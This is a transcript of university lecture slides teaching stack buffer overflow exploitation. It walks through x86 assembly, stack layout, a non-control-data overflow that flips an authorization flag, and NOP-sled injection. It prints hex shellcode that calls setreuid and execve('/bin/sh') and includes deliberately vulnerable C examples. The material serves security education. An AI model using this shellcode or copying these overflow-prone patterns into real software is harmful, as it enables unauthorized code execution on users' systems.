Presentation is loading. Please wait.

Presentation is loading. Please wait.

Part II Let’s make it real Memory Layout of a Process.

Published byDorthy Holland Modified over 8 years ago

Similar presentations

Presentation on theme: "Part II Let’s make it real Memory Layout of a Process."— Presentation transcript:

1

2 Part II Let’s make it real

3 Memory Layout of a Process

4 In reality Addresses are written in hexadecimal: For instance, consider the assembly code for IE(): 0x08048428 :push %ebp 0x08048429 :mov %esp,%ebp 0x0804842b :call 0x8048404 0x08048430 :pop %ebp 0x08048431 :ret

5 In reality Addresses are written in hexadecimal: For instance, consider the assembly code for IE(): 0x08048428 :push %ebp 0x08048429 :mov %esp,%ebp 0x0804842b :call 0x8048404 0x08048430 :pop %ebp 0x08048431 :ret

6 In reality Addresses are written in hexadecimal: For instance, consider the assembly code for IE(): 0x08048428 :push %ebp 0x08048429 :mov %esp,%ebp 0x0804842b :call 0x8048404 0x08048430 :pop %ebp 0x08048431 :ret

7 In reality Addresses are written in hexadecimal: For instance, consider the assembly code for IE(): 0x08048428 :push %ebp 0x08048429 :mov %esp,%ebp 0x0804842b :call 0x8048404 0x08048430 :pop %ebp 0x08048431 :ret

8 Similarly The assembly code for getURL(): 0x08048404 :push %ebp 0x08048405 :mov %esp,%ebp 0x08048407 :sub $0x18,%esp 0x0804840a :mov 0x804a014,%eax 0x0804840f :movl $0x40,0x8(%esp) 0x08048417 :lea -0xc(%ebp),%edx 0x0804841a :mov %edx,0x4(%esp) 0x0804841e :mov %eax,(%esp) 0x08048421 :call 0x8048320 0x08048426 :leave 0x08048427 :ret

9 Similarly The assembly code for getURL(): 0x08048404 :push %ebp 0x08048405 :mov %esp,%ebp 0x08048407 :sub $0x18,%esp 0x0804840a :mov 0x804a014,%eax 0x0804840f :movl $0x40,0x8(%esp) 0x08048417 :lea -0xc(%ebp),%edx 0x0804841a :mov %edx,0x4(%esp) 0x0804841e :mov %eax,(%esp) 0x08048421 :call 0x8048320 0x08048426 :leave 0x08048427 :ret

10 So we have: ret pop %ebp call 0x8048404 mov %esp,%ebp push %ebp IE stack 103 1022 1023 1024 1019 1021 1020 1018 1017 1016 1015 1014 1013 1012 1011 1010 old FP 1009 1008 1007 64 (buf) fd (code for read) read 0x08048428 0x08048431 ret leave call 0x8048320 mov %eax,(%esp) mov %edx,0x4(%esp) lea -0xc(%ebp),%edx movl $0x40,0x8(%esp) mov 0x804a014,%eax sub $0x18,%esp mov %esp,%ebp push %ebp getURL 0x08048404 0x08048427 getURL () { char buf[40]; read(stdin,buf,64); get_webpage (buf); } IE () { getURL (); }

11 So we have: ret pop %ebp call 0x8048404 mov %esp,%ebp push %ebp IE stack 103 1022 1023 1024 1019 1021 1020 1018 1017 1016 1015 1014 1013 1012 1011 1010 old FP 1009 1008 1007 64 (buf) fd (code for read) read 0x08048428 0x08048431 ret leave call 0x8048320 mov %eax,(%esp) mov %edx,0x4(%esp) lea -0xc(%ebp),%edx movl $0x40,0x8(%esp) mov 0x804a014,%eax sub $0x18,%esp mov %esp,%ebp push %ebp getURL 0x08048404 0x08048427 getURL () { char buf[40]; read(stdin,buf,64); get_webpage (buf); } IE () { getURL (); }

12 stack 103 1022 1023 1024 1019 1021 1020 1018 1017 1016 1015 1014 1013 1012 1011 1010 old FP 1009 1008 1007 64 (buf) fd What about the stack? getURL () { char buf[40]; read(stdin,buf,64); get_webpage (buf); } IE () { getURL (); } ret pop %ebp call 0x8048404 mov %esp,%ebp push %ebp IE (code for read) read 0x08048428 0x08048431 ret leave call 0x8048320 mov %eax,(%esp) mov %edx,0x4(%esp) lea -0xc(%ebp),%edx movl $0x40,0x8(%esp) mov 0x804a014,%eax sub $0x18,%esp mov %esp,%ebp push %ebp getURL 0x08048404 0x08048427

13 0xbfffeedc 0x08048430 getURL () { char buf[40]; read(stdin,buf,64); get_webpage (buf); } IE () { getURL (); } old FP 64 (buf) fd What about the stack? 0xbfffeeb0 0xbfffeeb4 0xbfffeeb8 0xbfffeebc 0xbfffeec0 0xbfffeec4 0xbfffeec8 0xbfffeecc 0xbfffeed0 0xbfffeed4 0xbfffeed8 0xbfffee98 0xbfffee9c 0xbfffeea0 0xbfffeea4 0xbfffeea8 0xbfffeeac ret pop %ebp call 0x8048404 mov %esp,%ebp push %ebp IE (code for read) read 0x08048428 0x08048431 ret leave call 0x8048320 mov %eax,(%esp) mov %edx,0x4(%esp) lea -0xc(%ebp),%edx movl $0x40,0x8(%esp) mov 0x804a014,%eax sub $0x18,%esp mov %esp,%ebp push %ebp getURL 0x08048404 0x08048427 When getURL is about to call ‘read’ 4 bytes

14 And now the exploit

15 Exploit 0x08048430 buf getURL () { char buf[10]; read(fd, buf, 64); get_webpage (buf); } IE () { getURL (); } 0xbfffeeb0 0xbfffeedc 0xbfffeeb0 0xbfffeeb4 0xbfffeeb8 0xbfffeebc 0xbfffeec0 0xbfffeec4 0xbfffeec8 0xbfffeecc 0xbfffeed0 0xbfffeed4 0xbfffeed8 0xbfffee98 0xbfffeea4 0xbfffeea8 0xbfffeeac

16 That is it, really all we need to do is stick our program in the buffer Easy to do: attacker controls what goes in the buffer! – and that program simply consists of a few instructions (not unlike what we saw before)

17 But sometimes We don’t even need to change the return address Or execute any of our code Let’s have a look at an example, where the buffer overflow changes only data…

18 get_medical_info() { boolean authorized = false; char name [10]; authorized = check(); read_from_network (name); if (authorized) show_medical_info (name); else printf (“sorry, not allowed”); } Exploit against non control data

19 get_medical_info() { boolean authorized = false; char name [10]; authorized = check(); read_from_network (name); if (authorized) show_medical_info (name); else printf (“sorry, not allowed”); }

20 name authorized=T get_medical_info() { boolean authorized = false; char name [10]; authorized = check(); read_from_network (name); if (authorized) show_medical_info (name); else printf (“sorry, not allowed”); } Exploit against non-control data

21 Other return targets also possible! This is what we did before

22 But other locations also possible If we start the program ourselves, we control the env

23 So all the attacker needs to do…... is stick a program in the buffer or environment! – Easy: attacker controls what goes in the buffer! – What does such code look like?  “shellcode”

24 Typical injection vector Shellcode address: – the address of the memory region that contains the shellcode Shellcode: – a sequence of machine instructions to be executed (e.g. execve("/bin/sh")) NOP sled: – a sequence of do-nothing instructions (nop). It is used to ease the exploitation: attacker can jump anywhere inside, and will eventually reach the shellcode (optional) NOP sled shellcode address of shellcode

25 How do you create the vector? 1.Create the shellcode 2.Prepend the NOP sled: perl -e 'print "\x90"' | ndisasm -b 32 – 00000000 90 nop 3.Add the address 0xbfffeeb0 setreuid execve why this? 00000000 31 C0 B0 46 31 DB 31 C9 1..F1.1. 00000008 CD 80 EB 16 5B 31 C0 88....[1.. 00000010 43 07 89 5B 08 89 43 0C C..[..C. 00000018 B0 0B 8D 4B 08 8D 53 0C...K..S. 00000020 CD 80 E8 E5 FF FF FF 2F......./ 00000028 62 69 6E 2F 73 68 4E 41 bin/shNA 00000030 41 41 41 42 42 42 42 00 AAABBBB.

26 In reality, things are more complicated why do you think encoding is so frequently used? – think strcpy(), etc. unpacker encoded shellcode

27 In reality, things are more complicated why do you think encoding is so frequently used? – think strcpy(), etc. unpacker encoded shellcode A: if strcpy() is used to overflow the buffer, it will stop when it encounters the null byte. So if the shellcode contains a null byte, the attacker has a problem. So the attacker may have to encode the shellcode to remove null bytes and then generate them dynamically

28 get_medical_info() { boolean authorized = false; char name [10]; authorized = check(); read_from_network (name); if (authorized) show_medical_info (name); else printf (“sorry, not allowed”); } authorized = F name Exploit against non control data

29 That is, fundamentally, it. Let us see whether we understood this.

30 Can you exploit this?

31 w without comments

Download ppt "Part II Let’s make it real Memory Layout of a Process."

Similar presentations

Recitation 4 Outline Buffer overflow –Practical skills for Lab 3 Code optimization –Strength reduction –Common sub-expression –Loop unrolling Reminders.

Recitation 4 Outline Buffer overflow –Practical skills for Lab 3 Code optimization –Strength reduction –Common sub-expression –Loop unrolling Reminders.
Smashing the Stack for Fun and Profit

Smashing the Stack for Fun and Profit
Introduction to Information Security ROP – Recitation 5 nirkrako at post.tau.ac.il itamarg at post.tau.ac.il.

Introduction to Information Security ROP – Recitation 5 nirkrako at post.tau.ac.il itamarg at post.tau.ac.il.
CSc 352 Programming Hygiene Saumya Debray Dept. of Computer Science The University of Arizona, Tucson

CSc 352 Programming Hygiene Saumya Debray Dept. of Computer Science The University of Arizona, Tucson
ITEC 352 Lecture 27 Memory(4). Review Questions? Cache control –L1/L2  Main memory example –Formulas for hits.

ITEC 352 Lecture 27 Memory(4). Review Questions? Cache control –L1/L2  Main memory example –Formulas for hits.
Part III Counter measures The best defense is proper bounds checking but there are many C/C++ programmers and some are bound to forget  Are there any.

Part III Counter measures The best defense is proper bounds checking but there are many C/C++ programmers and some are bound to forget  Are there any.
1 CHAPTER 8 BUFFER OVERFLOW. 2 Introduction One of the more advanced attack techniques is the buffer overflow attack Buffer Overflows occurs when software.

1 CHAPTER 8 BUFFER OVERFLOW. 2 Introduction One of the more advanced attack techniques is the buffer overflow attack Buffer Overflows occurs when software.
Programming Project # 1 cs155 Due: Thursday, April 21 st, 11:59pm Shayan Guha Elizabeth Stinson.

Programming Project # 1 cs155 Due: Thursday, April 21 st, 11:59pm Shayan Guha Elizabeth Stinson.
Buffer Overflow. Process Memory Organization.

Buffer Overflow. Process Memory Organization.
Windows XP SP2 Stack Protection Jimmy Hermansson Johan Tibell.

Windows XP SP2 Stack Protection Jimmy Hermansson Johan Tibell.
Computer Security Buffer Overflow lab Eu-Jin Goh.

Computer Security Buffer Overflow lab Eu-Jin Goh.
Buffer overflows and various code injection methods Raghunathan Srinivasan CSE 539, 2/2/2011.

Buffer overflows and various code injection methods Raghunathan Srinivasan CSE 539, 2/2/2011.
UBC104 Embedded Systems Functions & Pointers.

UBC104 Embedded Systems Functions & Pointers.
C Prog. To Object Code text text binary binary Code in files p1.c p2.c

C Prog. To Object Code text text binary binary Code in files p1.c p2.c
Attacks Using Stack Buffer Overflow Boxuan Gu

Attacks Using Stack Buffer Overflow Boxuan Gu
Security Exploiting Overflows. Introduction r See the following link for more info: operating-systems-and-applications-in-

Security Exploiting Overflows. Introduction r See the following link for more info: operating-systems-and-applications-in-
Assembly, Stacks, and Registers Kevin C. Su 9/26/2011.

Assembly, Stacks, and Registers Kevin C. Su 9/26/2011.
Fall 2008CS 334: Computer SecuritySlide #1 Smashing The Stack A detailed look at buffer overflows as described in Smashing the Stack for Fun and Profit.

Fall 2008CS 334: Computer SecuritySlide #1 Smashing The Stack A detailed look at buffer overflows as described in Smashing the Stack for Fun and Profit.
University of Washington Today Memory layout Buffer overflow, worms, and viruses 1.

University of Washington Today Memory layout Buffer overflow, worms, and viruses 1.
CrackChat #2 Stack Overflows and Format Strings Part 2: Baking the Egg 04-21-2011.

CrackChat #2 Stack Overflows and Format Strings Part 2: Baking the Egg

Similar presentations

Ads by Google